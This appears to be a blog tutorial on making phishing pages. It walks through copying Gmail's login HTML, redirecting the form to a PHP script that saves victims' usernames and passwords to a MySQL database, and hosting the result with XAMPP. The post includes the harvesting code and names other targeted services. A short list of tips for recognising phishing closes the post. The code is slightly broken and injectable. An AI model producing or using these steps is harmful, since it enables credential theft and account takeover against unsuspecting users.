DISCLAIMER:
What are phishing pages ?
These pages are generally used to steal passwords and usernames from the victim.For example,if I want a person’s Yahoo id,I make a fake login page which is similar to Yahoo’s login page.So when the victim comes into my page,he thinks it is Yahoo’s login page and types in his ‘Username’ and ‘Password’.But when he types in his password the page directs into the Yahoo error page (https://login.yahoo.com/config/login?) simultaneously the info he typed goes into my database .
How to make Fake Phishing Pages ?
Given below are some of the steps with which you can create your fake login page for any website or server (Yahoo,Myspace,Hotmail,Zapak,AOL,Orkut….etc.).In this whole tutorial I’m taking the example of gmail, For making any other server’s fake login do the same.You will get the hold of it when you read the whole tutorial
- First go to gmail login page “https://gmail.com”
- Right click on the page and go to “View Page Source”.
- You will see the whole HTML coding in it of the page(Huge huh ?).
- Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C
- Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Gmail.html’. Now search for "action" by pressing CTRL+F and replace the link after action with "access.php"(I'm using php for phishing).
- Then you have to make a access.php file.For that, open another text document and paste the following code in it (you need a database to store login details-How to create a database using Xampp server is discussed bellow).
$u=$_POST['Email'];
$p=$_POST['Passwd'];
$con=mysql_connect("serverhost","username","password") //Replacethese details with your database details
mysql_select_db("databaseName",$con); //select your database, into which you need to save others details
mysql_query("insert into login values('$u', '$p')"); //login is table name
?>
?>
- For executing the php script you need special plugins or a server to mange both php & database, The best server I suggest is Xampp(click here to download xampp)
- Start the server and open browser and in the url type localhost or 127.0.0.1 and press enter
- By using "php my admin" tab create a database and on that database create table with name "login" with two attributes one for username and other for password.
- Now copy the "Gmail.html" and "access.php" files under xampp/htdocs.
- Now open new tab and goto url "127.0.0.1/Gmail.html", a "Gmail" phishing page is opend. Details of any one who logged from this page will be stored into "login" table
For xampp:
- "serverhost" is "127.0.0.1", to connect with local database on your mechine.
- server username="roort".
- password="", i.e null.
How To Identify The Phishing Mails:
- You can easily identify "phishing mails" by observing the "url" in the address bar, make sure that address above is related to the mail server what you are using
- Better not to enter the correct id and password for the first time you are trying to signin
- For safe login always type url in the address bar, don't enter your details in already open page
- Don't click on the links in the unknown/untrusted websites, better to keep your self away from those sites and links
- Don't provide your confidential data(username, password) in any other websites or forms
- For secure login, login only from the official webpages of service provider. There will be a lock symbol on the end of the address bar which provides secure connection and the protocol will be HTTPS://
No comments:
Post a Comment